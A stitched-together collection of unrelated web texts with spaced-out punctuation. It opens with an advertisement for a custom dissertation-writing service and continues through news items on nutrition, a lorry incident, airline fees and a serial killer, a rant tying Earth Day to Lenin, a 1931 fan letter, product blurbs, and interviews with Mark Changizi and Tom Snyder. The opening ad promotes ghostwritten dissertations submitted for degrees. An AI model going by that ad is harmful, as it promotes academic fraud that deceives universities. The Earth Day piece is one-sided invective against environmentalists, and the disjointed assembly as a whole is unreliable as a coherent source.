Postgraduate students pay thousands per year , just to face an unsustainable model that forces them to give up their jobs and personal lives just to pursue a PhD degree .
That ’s not an option .
These students already have careers .
The doctoral degree should contribute towards professional growth .
It should n’t force them to put their jobs on pause .
The best dissertation writing service offers a solution that works for all students .
They can submit brilliant custom written dissertations without violating any deadlines and without quitting their jobs .
Some students can manage their time effectively enough to be able to complete the project .
But they get stuck nonetheless .
That ’s because they do n’t have the needed writing skills or they can’t gain access to the needed materials .
With the assistance of custom dissertation writing service , they overcome these shortcomings and still get the degrees they paid for .
Features & Guarantees Writers MA / PhD degree
100 % Custom Written
24/7 Service Available
Privicy Guarantee
Money Back Guarantee
How it works
Papaya is a fruit rich in beta - cryptoxanthin Obvious choices of fruit and vegetables are not necessarily the healthiest , say researchers .
According to US experts , making simple swaps like eating sweet potatoes instead of carrots and papaya rather than oranges could make a difference .
Foods , like raspberries , watercress and kale , are richer in phytonutrients which may help prevent disease , they told a US meeting .
UK nutritionists said a balanced diet is essential to good health .
The British Nutrition Foundation warned that relying on eating a few select food types to boost health was ill - advised and said there was no such thing as a " superfood " .
No one food can give you everything you need
Dr Emma Williams of the British Nutrition Foundation Experts recommend five portions a day of fruit and veg in a healthy diet .
Plant foods are known to contain " phytonutrient " chemicals that can protect the heart and arteries and prevent cancers .
But the most popular varieties may not be the best , according to US researchers .
They analysed data from US health surveys of people 's dietary habits to look at the most common sources of phytonutrients .
They found that for 10 of the 14 phytonutrients studied , a single food type accounted for two - thirds or more of an individual 's consumption , regardless of how much fruit and veg they ate overall .
Carrots were the most common source of beta - carotene , oranges and orange juice the most common source of beta - cryptoxanthin , spinach the most common source of lutein / zeaxanthin , strawberries the most common source of ellagic acid and mustard the biggest provider of isothiocyanates .
However , for each of these phytonutrients there was a richer food source available .
Richer foods
Switching from carrots to sweet potatoes would nearly double beta - carotene intake , say the researchers .
Similarly papaya contains 15 times more beta - cryptoxanthin than oranges , while kale has three times more lutein / zeaxanthin than spinach .
Raspberries have three times more ellagic acid than strawberries and one cup of watercress contains as much isothiocyanate as four teaspoonfuls of mustard .
Study leader Keith Randolph , who is a technology strategist for the supplement company Nutrilite , said : " These data highlight the importance of not only the quantity but also the significant impact the quality and variety of the fruits and vegetables you eat can have on your health . "
Dr Emma Williams of the British Nutrition Foundation said : " They are right that some foods are richer sources of phytonutrients .
" But at the end of the day , to be healthy you need to make sure you have a varied and balanced diet .
" No one food can give you everything you need . "
The findings were presented at the 2010 Experimental Biology conference in Anaheim , California .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Today , on April 22nd , the posthumous children of Vladimir Lenin celebrate their great holiday , the so - called Earth Day .
Vladimir Lenin was born in Simbirsk ( later Ulyanovsk ) on April 22nd , 1870 - or April 10th , according to the Old System .
The first Earth Day was celebrated exactly on Lenin 's 100th birthday , on April 22nd , 1970 , a " coincidence " that the Time magazine called a " communist trick " .
Lenin 's mother , Maria Blank , was a schoolmistress .
If you think that this is already pretty close to physics , you should notice that Lenin 's father , Ilya Ulyanov , was actually a physics instructor !
Much like his posthumous children , the environmentalists , he was obsessed with the writings of Marx .
And he promoted them to a pragmatic realistic version , Marxism - Leninism .
It was so realistic that it managed to cripple Russia , surrounding nations , and most of Central and Eastern Europe for much of the 20th century .
So congratulations to all the people who celebrate on April 22nd .
Kindly accept 700 peer - reviewed articles against AGW as a gift .
And please , notice that you have already vastly exceeded the tolerable level of murders and economic and moral devastation that can be forgiven to one such a movement .
So if you want to keep the whole planet red or green or whatever color you choose , you will really have to look for a different planet , Planet B , where you may try to realize your pathological desires .
On this planet , there 's no longer any room for you , environmentalists and communists .
Go away .
And that 's the memo .
The late , great , Forrest J. Ackerman – legendary science fiction fan ; originator of the phrase ‘ sci fi ’ ; editor of Famous Monsters of Filmland ; unstoppable collector of memorabilia , and creator of Vampirella – once wrote a charming letter to novelist Edgar Rice Burroughs .
Ackerman was 14 years of age at the time , and had just spent the day arguing with a teacher on the subject of Burroughs ’ writing .
That evening , full of pride following his commendable , spirited defense of the author , Ackerman put pen to paper in order to inform him .
That letter , along with Burroughs ’ reply , can be read below .
Transcripts follow .
Burroughs ’
Reply :
Transcripts
530 Staples Avenue
San Francisco
California
August 25 , 1931
Mr. Edgar Rice Burroughs
Tarzana Ranch
Tarzana
California
My dear Mr. Burroughs :
I have something to tell you which I think you will find very amusing .
I am a fourteen year old boy and am a low Junior in High School .
Today at school our teacher was discussing “ good literature . ”
I asked if Edgar Rice Burroughs was all right for a book report .
I knew she ’d say “ no ” ( teachers always do ) but I did n’t expect her to lecture to the class for the whole period about how terrible your books were !
The discussion was as follows ( as nearly as I can remember ) : Teacher speaking : “ His first Tarzan book was all right .
I ’d advise you all to read it .
Why when I read it I actually imagined I was a monkey hanging by my tail in a jungle .
It was very real .
But all his stories since then have been just repitions . ”
I cut in with : “ Oh , I do n’t think so .
I ’ve read everyone of ’em and I ’m goofy to read every new one that comes out . ”
Well with that she burst into a perfect tirade !
“ If I were to buy the highest priced box of chocolates obtainable , ” she said , “ and were to offer it to you along with a box of old cheap stuff , which would you take ?
Why the good candy of course !
Yet you ’ll go to extremes to pick up this horrid literature out of the garbage cans such as Burroughs writes . ” — and she went on for hours and hours and hours .
I got in a good word for you every chance I could .
Then came the last straw when she said : “ Now if he ’d write like Verne his stories would be more acceptable .
Verne had something .
He could write of a submarine , something that did n’t exist in his time .
He had imagination .
Burroughs does n’t . ”
Now I ask you : is Verne ’s sub .
any better example of imagination than your machine that went to the center of the earth ?
Not as far as I can see !
Another thing : she said she ’d be in jungles many times and your conception of them was “ all wet ” , so to speak .
She says you do n’t know what you ’re talking about .
Claims there are no such jungles of trees as Tarzan goes thru and a lot of other nonsence .
Who cares about that ?
All you speak of is real to me .
Hawthorne , Cooper and others may have written “ Classics ” , but I ’ll take one of your fast - moving novels any day to those dead old things that ought to have been buried years ago .
Now , to get off the subject .
The first story I ever read by you was “ The Mastermind of Mars ” in AMAZING STORIES ANNUAL .
I read that magnasplendent story when I was living in Hollywood .
Shortly after that I moved to San Francisco .
Then , for the first time in my life , I went to a library .
I asked if any such person as Edgar Rice Burroughs had written any books that were in the library .
Well you can imagine my joy when I found you ’d written stacks !
I grabbed “ Chessmen of Mars ” and a “ Tarzan ” book and home I flew .
Oh boy !
What a time I had for the next year reading your stories .
Now I ’ve read every one .
I ’m trying to save up some money to buy your “ Fighting Man of Mars ” but I do n’t seem to be getting anywhere .
I do n’t expect you ’ll bother to answer this –maybe you have n’t even read it –but anyway will you please autograph the enclosed card and return it to me .
Thank you , so much !
And now I ’d better sign off .
I certainly envy the fellow–if there is such a fellow –that is friendly enough with you to call you Eddie !
Yours very respectfully ,
( Signed , ‘ Forrest J Ackerman ’ )
Forrest J. Ackerman
Gardening ’s gone guerilla -
You ’ve seen them , you may have looked away , but you ’ve seen them .
Those forgotten areas of the estate , left to fall apart and fall into disrepair .
The municipal scrubland where nothing can grow ...
Or can it ?
Turn the concrete jungle into a wilderness with our compacted wild flower seed grenades .
Buttercups and Poppies will take at least 3 weeks to start growing Ryegrass will be the first thing to grow after about one week
We advise this product should only be shipped within Europe ,
There may be restrictions on seed imports to other countries .
Pack of 3 - Design by Tony Minh Nguyen and Snowhome
A lorry driver who was shown on YouTube driving along a motorway with a car trapped in front of his cab has been told he can keep his licence .
The footage showed a Renault Clio being pushed at high speed along the A1 ( M ) , near Wetherby , Yorkshire , in January .
The lorry driver , John Tomlinson from Lancashire , appeared before North West traffic commissioner Beverley Bell .
She told him he could retain his LGV driving licence because he could not see , hear or smell the car .
At the hearing at the Traffic Area Office in Warrington , Cheshire , Ms Bell praised Mr Tomlinson 's coolness and " clear head " on discovering the Clio attached to his lorry .
What you found when you pulled into the hard shoulder must have come as a complete shock and I think what you did , in reversing your tanker to release the Clio , was of huge credit to you Beverley Bell , Traffic commissioner
Sean Joyce , Mr Tomlinson 's solicitor , told the hearing how Clio driver Rhona Jane Williams was joining the southbound carriageway of the A1 ( M ) at junction 44 when the incident happened at around 0830 BST on 13 January .
The slip road joins the middle lane of the motorway , so she was effectively undertaking the 44 - tonne tanker , Mr Joyce said .
Ms Williams , a vet from York , told police she felt a " bump " as the vehicles came together and her car pivoted 90 degrees .
Unaware of the incident , Mr Tomlinson continued driving until a motorist began flashing his hazard lights .
Mr Tomlinson , from Clitheroe , brought his lorry to a stop on the hard shoulder and only became aware of Ms Williams in the Clio when he got out of his vehicle .
' Indescribable ' pressure
He tried to free her but the door was jammed so he reversed his tanker about 3ft ( 91 cm ) to release the car .
Ms Bell told Mr Tomlinson that it was " absolutely clear " that he could not see Ms Williams ' Clio .
" What you found when you pulled into the hard shoulder must have come as a complete shock and I think what you did , in reversing your tanker to release the Clio , was of huge credit to you .
" You showed , in my view , coolness and a clear head .
" I feel it is entirely inappropriate for me to take away your licence .
" You , your employers and the haulage industry should be able to hold your heads up high after this incident . "
Image caption John Tomlinson said the pressure of the investigation was " indescribable "
Ms Bell added that the case illustrated the dangers of lorry blind spots and urged firms to install close proximity mirrors on older vehicles .
It is now law for them to be installed in new lorries , she said .
After the hearing , Mr Tomlinson , a lorry driver for 29 years , appeared close to tears and said the pressure of the investigation was " indescribable " .
His solicitor added : " This incident was , as they say , a freak of nature and purely accidental . "
Ms Williams told the Daily Mail shortly after the incident : " I just screamed at the [ emergency services ] operator ' I 'm going to die , I 'm going to die - can you do something ? '
" She tried to calm me down but there was n't really anything she could do at the end of the phone . "
Video footage of the incident was captured on a mobile phone by a passenger in a passing car and has attracted more than half a million views since it was uploaded to YouTube last February .
West Yorkshire Police investigated the incident but took no further action against Mr Tomlinson following advice from the Crown Prosecution Service .
I 've heard it all before .
I 've said it all before .
The Oscar show is too long .
Too boring .
Too , too much .
So here , a modest proposal for some changes to make the telecast more real , more relevant , more fun .
Hold It Earlier in the Year -- Everything else has sped up ; now , by Oscar time , many of these movies have already closed ( or been honored at one of a dozen other awards shows ) .
Move the Oscars to Feb. 1 and they 'll feel fresher .
Start It Earlier in the Day --
This is Barbara Walters ’ 29th – and last – year interviewing celebrities beforehand .
Great .
Do n’t replace her , and begin the show earlier .
Even a half - an - hour head start , and things might finally wrap up by 11 .
One Host --
Yeah , I 'm looking forward happily to Steve Martin , and nervously to Alec Baldwin .
But multiple hosts usually slow things down .
Stick with a single , smart , ad - libbing talent .
Just not David Letterman .
No Banter -- Comedy is good .
Forced comedy is bad .
Please no more corny puns , or painfully " funny " choices like having a sex symbol give out the award for " best special effects " or a kid actor present " best short subject . "
No Plugging --
Why is Star A standing up there at the podium with Star B ?
Because they have a new movie coming out soon and they want to push it any way they can .
It 's a crass move .
Save the selling for the commercials .
No Salutes --
I have fond memories of Billy Crystal ’s annual “ It ’s a Wonderful Night for Oscar . ”
But last year ’s big “ salute to the musical ” extravaganza was solely a salute to Hugh Jackman .
Can the medleys .
No Montages --
A related complaint – those endless themed clip jobs that recycle the same old " magical " moments .
( How many times are we going to see " No prisoners ! " from " Lawrence of Arabia " ? )
Enough already .
No Minor Awards --
The Academy has always resisted this , but really .
Two awards for sound ?
Three awards for short subjects ?
Give them out during commercials , or fold into the earlier night of purely technical prizes .
Better Presenters --
Having former winners announce the various acting nominees is a good idea – if there 's a connection .
But last year saw Sir Ben Kingsley praising … Mickey Rourke ?
From now on , book friends , mentors .
Party , Party , Party --
Make it the way it used to be ( and what the Golden Globes copied ) :
A night just for the nominees and their friends , with an open bar .
Then turn on the cameras .
Now that 's entertainment .
These are some of my suggestions .
What are yours ?
More Academy Awards coverage :
• Top 10 Academy Awards ' makeup '
Oscars for overlooked performers
• Top 10 worst Academy Awards best song winners - Is Oscar tone deaf ?
• Top 10 Academy Awards most shocking Oscar snubs
• Top 10 Academy Awards most memorable Oscar moments
Low cost airlines are notorious for their add - ons ; food and checked - in baggage cost extra on many Australian flights .
Now no -frills airlines overseas are going even further .
Ireland 's Ryanair has confirmed it plans to charge customers to use the toilets and an American low - cost carrier wants to charge people to use overhead lockers if their bags do not fit under the seats in front of them .
It may seem outrageous to some but analysts say there is a good reason airlines might start to charge for using overhead lockers or toilets .
Centre for Asia Pacific Aviation chairman Peter Harbison says wafer thin margins are behind the moves .
" First of all they can get an extra half - a - dozen seats in , which is more than the profit usually for a whole aircraft operation , " he said .
" It saves them a lot of money in servicing two additional toilets .
All those sorts of issues , they all add up quite considerably . "
Mr Harbison says it is quite possible that Australian carriers will also consider following suit at some point in the future .
" I 've got no doubt that every airline is looking at how much space the toilets take up , and not just low cost carriers but all carriers , " he said .
" And bear in mind too that we 're not talking about six , seven , eight - hour flights here .
We 're talking about 45 minutes to an hour , so it 's not something that 's likely to strain the ability of most people for that length of time . "
Ellis Taylor , a reporter for Australian Aviation Magazine and former Jetstar employee , says Ryanair 's move is a bold one and Australian airlines are likely to be cautious about doing the same .
" At this stage I think they 'd be very bold .
I think a lot of people are going to wait and see how it goes down with Ryanair first , " he said .
" I 'm not aware of the airlines in this part of the world looking at that option and I think a lot would argue that it actually probably goes a little bit too far .
" But you know in this day and age you never know what will happen . "
Mr Taylor says the process of separating charges is likely to continue as airlines attempt to improve their profit margins .
But he says there are a number of potential complications , including the role of flight attendants .
" Essentially they 're going from people who are concerned with safety and service into , for lack of a better word , checkout chicks ; just looking to collect revenues be that through credit cards or cash and so forth , " Mr Taylor said .
" And I think there 's going to be some resistance from flight attendants because to some of them it might be cheapening their role . "
Virgin Blue says it currently has no plans to charge for either toilets or overhead lockers .
Game controls - Use Mouse to interact .
Each person has 1 , 2 or 3 actions ( moves ) .
You can choose to move or shoot .
If you shoot , it will take 1 , 2 , or 3 actions .
The more actions ( moves ) it takes , the higher the accuracy percentage chance of killing the Alien .
00 being a miss , and 99 being a sure kill .
Hint : Keep the people close together .
Thursday , March 25 , 2010
Just an orca , not the real deal !
The tour boat was approximayely 50 to 100 m away when the orca attack occurred , as the other orcas fled .
The hungry animal 's markings showed it was a female killer whale that chased the orca for several minutes , playing or toying with it , flicking it about 10 metres into the air , before finally breaking the pseudo orca 's back on her nose .
Lunch is served !
What 's a pseudorca you might ask ?
Whale and dolphin researcher
" It [ the pseudorca ] is similar to a pilot whale but the skull closely resembles an orca .
" So when they first found the skulls they thought it was an orca .
" When they found out it was n't , they called it a false orca or pseudorca .
" They look more like a pilot whale ... with a more pointed face . "
Image Source
What 's a pseudorca you might ask ?
NZ Herald reveals
Whale and dolphin researcher Dr Ingrid Visser said they got their name because their skulls were similar to orca .
" It [ the pseudorca ] is similar to a pilot whale but the skull closely resembles an orca .
" So when they first found the skulls they thought it was an orca .
" When they found out it was n't , they called it a false orca or pseudorca .
" They look more like a pilot whale ... with a more pointed face . "
The attack occurred at the Black Rocks , about four nautical miles from Paihia , after a pod of eight killer whales chased more than a dozen pseudo orcas across the bay .
The saga , dear friends , is at an end .
After making it to pre-order status last month , the EeeKeyboard is at long last ready for public consumption .
Lest you 've forgotten , this truly all - in - one pc comes with an Atom N270 inside , a gig of RAM , and old reliable Windows XP Home to keep you company .
A 5 - inch 800 x 480 multitouch display is supported by a Broadcom Crystal HD chip for decoding of high - def video , UWB connectivity to wirelessly stream to a nearby HDTV , and a battery that promises four hours of autonomous use .
Yours for only $ 599 .
[ Thanks , Joe F. ]
Favorite Answer
Seriously ?
I 'm a believer in God , for the record .
Rainbows were scientifically explained decades ago .
The droplets of water act as a prism for the light traveling through it with refracts the light into the visible colors ... which then reflect off of other water droplets into our eyes so we can see it .
Mountains and oceans have also been explained .
Mountains have largely been formed by the motion of tectonic plates on the earths surface pushing into one another creating mountains .
There 's lots of hydrogen throughout the universe , and plenty of oxygen .
When these two elements come together in a certain way , they form H2O .
The only reason our oceans are liquid is because of their distance from the sun .
Look into it and you 'll discover the universe is full of water in the form of ice , because it 's not close enough to a heat source to remain a liquid .
Lastly , there 's a difference between believing in God , and believing the Bible .
I do n't completely agree with the Bible , specifically Genesis ( creation ) .
I believe that we are largely here by cosmic chance , the big bang theory , and evolution .
But I still believe in God .
How about you pay attention in elementary school where they explained rainbows , and geography .
CONVICTED " Dating Game " psycho killer Rodney Alcala hoarded 1000 photos of women and children in a chilling photo diary that could help police solve dozens of Cold Case investigations .
The New York Police Department this week released 226 snaps of women and children they believe were photographed by the death - row psychopath while he lived in New York in the 1970s .
They want to identify those photographed who they say might be dead or alive .
Alcala , who allegedly went by the name John Berger while living in New York , took the photographs around Greenwich Village while studying film under shamed sex - case director Roman Polanski in the city .
He was known for charming women with his good looks , his suave appeal landing him a spot on Tv's The Dating Game .
Watch Alcala in this clip from the show
The photographer with a genius - level IQ was found to be hoarding 1,000 pictures in a storage locker when he was finally arrested .
Many of the shots are suggestive in nature .
The serial killer , now 66 , is on death row in California for killing four women and a 12 - year - old girl .
Photos
Alcala is still a suspect in at least two Manhattan murders , including the 1977 murder of Ellen Hover , daughter of the owner of Ciro's , a legendary Hollywood club .
Hover ’s body was discovered in a shallow grave in 1978 .
Hover ’s cousin , Sheila Weller , said this week she is upset the photos were n’t made public sooner .
" They should be in every newspaper , on TV and on the Internet , " Weller told The New York Daily News prior to the release of the NYPD 's photos .
" It is rare that someone kept trophies of the women he came into contact with . "
Another Manhattan victim , TWA air hostess Cornelia Crilley , 23 , was sexually assaulted and strangled to death in her Manhattan apartment in 1971 .
Forensic evidence left at the scene connected Alcala to the slaying .
Retired detective Steve Mack , who worked on the Alcala case until 2008 , said releasing the material to the public could help flesh out the true toll that Alcala took on society .
" He definitely was involved in more murder than we know of , " Mack said , adding that he fears the body count could top 20 before the investigation is finally closed .
He said his hope is that having the pictures made public will help families of loved ones who may have fallen into Alcala 's killer clutches .
" We ought to give the families that lost loved ones a proper identification , " he said .
See more pictures from the gallery
Originally published as Psycho killer 's chilling photo album
For theoretical neurobiologist and author Mark Changizi , “ why ” has always been more interesting than “ how . ”
While many scientists focus on the mechanics of how we do what we do , his research aims to grasp the ultimate foundations underlying why we think , feel and see as we do .
Guided by this philosophy , he has made important discoveries on why we see in color , why we see illusions , why we have forward - facing eyes , why letters are shaped as they are , why the brain is organized as it is , why animals have as many limbs and fingers as they do , and why the dictionary is organized as it is .
His latest book , The Vision Revolution , is a trenchant and insightful investigation into why humans see and interact with the world as we do .
His findings are challenging and often surprising , and his witty , engaging style is accessible to a broad range of readers .
He was generous enough to spend a few minutes with me recently to discuss his book and other topics .
NN : What originally led you to write a book about human vision in particular , instead of any of the other human evolutionary adaptive traits ?
MC : Indeed , I do n’t consider myself solely a vision scientist .
I call myself a theoretical neurobiologist , more generally , and I have had a number of non-vision research directions , including , for example , the shape and evolution of the brain , and why animals have as many limbs and digits as they do .
Some of these research directions were central parts of my first book , The Brain from 25,000 Feet .
I was led to a book on vision because that ’s where my research led me , and so the question is , Why did I end up with quite a few research directions in vision ?
As a theoretical neurobiologist , I try to find interesting phenomena that I can wrap my head around , with the hope of putting forth and testing rigorous and general explanatory hypotheses .
That ’s not easy , but there are a number of reasons why it ’s easier for vision .
First , relative to other senses and / or behaviors , the amount of data we possess for vision is huge .
There ’s a century - sized pile of data , much of it not well explained , much less in a unifying manner .
Second , vision is theoretically approachable .
You have a visual field , you see objects , and so on .
We know how to at least begin thinking about the phenomenology .
It ’s more difficult for audition , and practically impossible for olfaction , where we have little idea how to even describe our perceptions .
… forget about explaining anything !
And , third , for vision we have the best understanding of the underlying mechanisms .
My point is that , as a theorist struggles for phenomena he or she can crack , vision appears as a large attractive target compared with many other aspects of brain and behavior .
One may end up attacking vision problems even if one is n’t excited by vision , merely because it ’s juicy .
( I am excited by it , though , especially to the extent that I can find exciting hypotheses . )
I was intrigued by the “ mind reading ” aspects of vision .
In a nutshell , how does this work , and how do humans benefit from this ability ?
Our color vision fundamentally relies upon the cones in our retina , and I argue in my research that color vision evolved in us primates for the purpose of sensing the emotions and states of those around us .
We primates have an unusual kind of color vision – our cones sample the visible spectrum in a peculiar fashion – and I have shown that one needs that kind of peculiar color sense in order to pick up the color modulations that occur on our skin when we blush , blanch , redden with anger , and so on .
Our funny primate variety of color vision turns out to be optimized for seeing the physiological modulations in the blood in the skin that underlies our primate color signals .
So , we evolved special mechanisms designed for sensing the emotions and states of others around us .
That sounds a lot like the evolution of a “ mind - reading ” mechanism , which is why I ( only half in jest ) describe it that way .
You mention in the book that reading and writing are relatively recent advances in human development , and yet we take for granted that we “ see ” and understand words , as if our brains were simply meant to see and understand them .
What ’s really going on that allows us to make sense of symbols on a page — and why can we do this at all ?
In talks I often show a drawing of a child reading a book titled “ How to Somersault . ”
The “ joke ” is that most kids are able to read very early , often even before they can do stereotypical ape behaviors like somersaults and monkey bars .
Sure , they comprehend speech much earlier , but they ’re getting orders of magnitude more speech thrown at them than writing .
Kids learn to read very early , and very well ; and as adults we are ridiculously capable readers , and spend nearly all our day reading .
Aliens might be excused for thinking we evolved to read .
But the invention of writing is only thousands of years old .
In addition , for most of us , our grandparents , great grandparents or great great grandparents did n’t read at all .
Writing is much too recent for our brains to have evolved to have reading mechanisms .
How does our brain do it ?
Is it because our visual system can become good at reading whatever we present to it ?
No .
Kids would surely not be capable readers by around six if they were tasked to read bar codes or fractal patterns .
The solution is that culture made writing easy on the eye , by shaping letters to be what the eye likes .
The idea that culture shapes our artifacts to be good for us is not new .
What ’s new here is a specific hypothesis for what writing should look like in order to be good for us .
To be easy on the eye , writing needs to “ look like nature , ” just what our illiterate visual systems are fantastically competent at processing .
The trick of that research direction was making this “ writing looks like nature ” idea rigorous , and coming up with ways of testing it .
I show that there are certain signature visual patterns found in nearly any natural environment with opaque objects strewn about , and that these signature patterns are found in human writing .
In short , writing has evolved so that written words look like visual objects .
You say that there are several visual “ tricks ” that makes us anticipate the next moment , while ensuring that the next moment never comes ( one of these tricks you call “ representational momentum ” ) .
Explain a little bit about how this works , and how does this misperception affect us in our day - to - day lives ?
When light hits our retina , what our brains would like to do is instantaneously generate a perception of what the world looks like .
Alas , our brain ca n’t do this instantaneously .
Our brains are slow .
It takes around a tenth of a second for your perception to be built , and that ’s a long time when you ’re moving about .
If you perceived the world the way it was when light hit your eye , you ’d be having a tenth - of - a - second old view of the world .
Because of this , visual systems have evolved mechanisms to try to generate a perception not of the way the world was when light hit the eye , but generate a perception of the way the world will be by the time the perception occurs in a tenth of a second .
By the time the perception is elicited , the anticipated future will have arisen , and the perception will be of the present .
That is , in order to perceive the present ( have perceptions at time t that are of the world at time t ) , our visual systems must anticipate the near - future .
These mechanisms are , I argue , up and running at all times , looking for all sorts of cues in the stimulus in an attempt to guess the way the world will change in the next moment .
And this is where “ tricks ” come in .
If we can cotton on to the cues your visual system is looking for in its attempt to guess the near future , then we can concoct artificial visual stimuli having these cues , but make sure they do not change as they “ should ” in the next moment .
That way , when you look at them , your brain will generate a perception of what “ should ” happen next , but it will now be wrong due to the mad , evil psychologist .
The classical geometrical illusions are one of many classes of illusion that can be explained in this way .
An example can be seen below , a variant of the Orbison illusion , where all the squares are actually the same , but appear quite different depending on where they lie within the radial display .
Here is a link where I have written up a very short explanation of illusions like this :
If you were in charge of designing a new human vision system , what improvements would you make to the one we have now ?
What would you fix – and do you think there ’s still evolutionary “ room ” left for human vision to evolve ?
If we were still living out in nature as we Homo sapiens were for nearly all of our evolutionary history , then I ’d be skeptical about any attempt to improve us .
The most brilliant engineering masterpieces in the universe are found in biology , and my guess would typically be that , unless one has a very strong argument otherwise , we ’re not smart enough to make any improvement .
But , of course , we ’re no longer living in the kinds of environments where we evolved , and the biology may no longer be the “ right ” kind .
In particular , I argue in the book that our forward - facing eyes are like a fish out of water .
Forward - facing eyes are , I argue , the optimal eye design for large animals living in forested habitats ; in those circumstances that eye design allows the animal to see the most .
But we ’re no longer living in cluttered habitats .
Our world is now filled not with leaves , but with trash cans , pillars , and cars .
In such circumstances sideways - facing eyes see the most , and animals in such environments accordingly have sideways - facing eyes .
In a million years I bet we ’ll be fish - faced .
One of the perennial questions in philosophy is : do we see things as they really are , or perceive them as we think they are ?
Given your work on human vision , what ’s your take on this ?
Let me give you three examples from the book that help us ponder these philosophical issues .
First consider illusions like those I discussed above .
One often feels as if what we see is due to some kind of direct “ reading ” of the real physical world .
But our brain ca n’t just passively react to the incoming stream of visual information , lest it have an old perception of the world .
Instead , it must actively generate a guess about the near future , which helps drive home that our perception is always an internal concoction by your brain .
In fact , most of the input to your visual system is feedback from that very visual system .
Second , consider forward - facing eyes and binocular vision .
When we see with two eyes in the same direction , we have one unified visual perception .
We have what feels like a single viewpoint , one that is emanating roughly from a point between our two eyes .
Furthermore , our single viewpoint is always filled with two copies of the world that you hardly ever notice .
When you fixate on something out in front of you , then objects nearer and farther split into two perceptual copies , each rendered as transparent in your perception .
This allows you to see objects , and to see beyond them .
For example , you can see your own nose from opposite sides at all times , but it is rendered as partially transparent and so does not block your view of the world beyond .
The more one analyzes the phenomenology of binocular vision , the stranger it seems .
But it does n’t feel strange , because these are perceptual facets that our brain knows how to interpret .
They are needed as part of your unified view of the world in order to incorporate the fact that it is really built out of two views of the world .
Although , in a sense , you are perceiving fictions , they are fictions that allow you to more veridically see the world .
And , lastly , consider color vision .
This is a case that helps us better understand that it is not so much whether you see the world as it is , but how much of the world ’s reality your are privy to seeing .
Colors are primarily about the underlying emotions and states of those around us , as seen through the window of skin , and the physiological changes in the blood .
The spectrum of skin is complicated , but it varies over two dimensions that matter most for sensing the states of others , the concentration and oxygenation of skin .
The question is , what does the concentration and oxygenation of blood in the skin of others “ truly ” look like ?
Or , what do the emotions those blood variables signify “ truly ” look like ?
The interesting thing here is that these blood dimensions and these emotions are “ really there ” , but there is little sense to what their “ real look ” might be .
Colors serve the role of what they look like , but does red really look like oxygenated blood or really look like anger ?
I ’m not sure this is a sensible question .
What matters is that that qualitative perceptual state is given a meaning or association to us , and so serves its purpose .
What ’s your next project ?
Any new books in the works that we should be looking out for soon ?
I just recently finished my new book , tentatively titled Harnessed : How Language and Music Mimicked Nature and Transformed Ape to Man .
Remember the child reading the book titled “ How to Somersault ” ?
If that kid can read so early because writing has culturally evolved to shape writing to look like nature , could n’t it be that speech has culturally evolved ( perhaps over hundreds of thousands of years , rather than just several thousand years ) to sound like nature ?
Could it be that speech has shaped itself to sound like the natural events that our auditory systems evolved via natural selection to be fantastic at processing ?
And , similarly , could it be that music has culturally evolved over time to sound like some other auditory aspect of nature that taps into ancient auditory mechanisms of ours , evocative ones ?
The short story of the book is , Yes .
And , in particular , I argue that speech sounds like solid - object physical events , whereas music sounds like people moving about .
Check out Mark Changizi ’s website here , and his blog here .
Creatively Speaking continues today with Tom Snyder , creator of one of my all - time favorite TV shows , Dr. Katz .
I 've also selected two excerpts from episodes that make me laugh every time I see " ˜em ( recently got a hold of the complete Dr. Katz on DVD , including commentary by Tom and Jonathan Katz , as well as some episodes that were n't originally aired ) .
First one to correctly tell us what movie Ben Katz is quoting somewhere hidden in the first clip gets serious _floss braggin rights .
Another interesting bit of Katz trivia : the song the Dr. sings in the first clip was written by our interviewee today , Tom Snyder .
Dr. Katz and son Ben
DI : How did you first come up with the idea for Dr. Katz ?
TS : I had an educational software company at the time and I 'd met a woman , a bartender , at the bar where I liked to write .
She drew on napkins all the time and eventually I asked her if she 'd like a job drawing illustrations for the educational software games .
She worked for me for a year and we started messing around on weekends with me recording my voice and her drawing silly illustrations .
So I did a little thing where I played a shrink who was talking to his son and did both of the voices by pitching my voice electronically .
It was about a minute long , animated .
We sent it out to a friend of mine who worked in Los Angeles .
A week later he called and said , ' Come on out and we 'll pitch it to Comedy Central , ' which we did .
They said , ' It 's fantastic , but what you need Tom is talent . '
Of
course , I thought they meant I was n't talented , which was hurtful .
But what they really meant was I needed to hire someone like a professional voice comedian to play some of the parts .
So I found out that my favorite stand - up comedian , Jonathan Katz , lived in my neighborhood in Boston .
So I went over to his house and played this little one minute thing and asked him if he'd like to be the doctor and he said , ' Definitely , yes . '
So we started making little bits and pieces and Comedy Central picked them up .
At first they were little bumpers that would go between advertisements .
But then they moved us up to the half - hour format and pretty soon we had an Emmy .
DI : The animation in Dr. Katz has a unique , static feel to it .
Can you tell us about the technique called Squigglevision , which gives the show its trademark look ?
TS : Well it 's not something I 'm proud of , except that it was cheap .
Some
people refer to it as the perfect crime .
Some people say it causes
epilepsy .
But with this educational software company , I 'd come up with a
really cheap way of making illustrations look animated by having an
illustrator draw an outline of a character and then the computer would
draw it five times over and over again with randomness added .
So it would
kinda squiggle .
And it was really cheap because there was no animation
involved .
So we started doing it on the Dr. Katz stuff , not really
thinking it would be enough for primetime but we stuck with it .
And it was
funny because there 's no animation .
Nobody walks anywhere , nobody reaches for anything .
Steven Spielberg became very interested in the effect and our comedy and so we did a pilot for Dreamworks and we were out at his office and I mentioned in passing that there was n't any animation , that it was just squiggling characters .
And he said , ' Well that 's not true because we just saw an episode and Dr. Katz is at the sink and then he walks over table and they have breakfast and Ben gets up to leave . '
And I said , ' No , actually , no one ever moves .
We just cut from one shot to the next , back and forth . '
So there 's no real animation involved .
DI : Did you coin the word Squigglevision ?
TS : Yes .
As a matter of fact , we copyrighted it , thinking : everyone is going
to be doing this .
Boy , how wrong we were .
It had charm , but I think it
kept us from being as mainstream as Family Guy and other shows that came
after it .
DI : If you had pitched the show today , do you think anyone would have even bothered ?
TS : No .
You could n't sell Dr. Katz today , regardless of the Squigglevision ,
for the simple reason that it 's not vulgar enough .
Even then they were
asking us if we could use the word ass more , if we could make it dirtier .
Even back in the mid-90s .
But we said , ' Nah , it 's really sweet . '
If a
stand - up comic has a particularly funny routine , we 'll do it .
But it
was n't what we were going for .
We were n't doing it to be rude .
We were
doing it to be funny and conversational , and kinda dry .
There 's no way you
could do it now .
My former company has a show on now called Assy McGee
for Cartoon Network and it's about a cop who 's just an ass .
And farts ,
that 's how it talks .
That 's the kind of stuff they 're doing now , which I
have no interest in , really .
I 'm an old - fashioned guy .
I like musical
comedy .
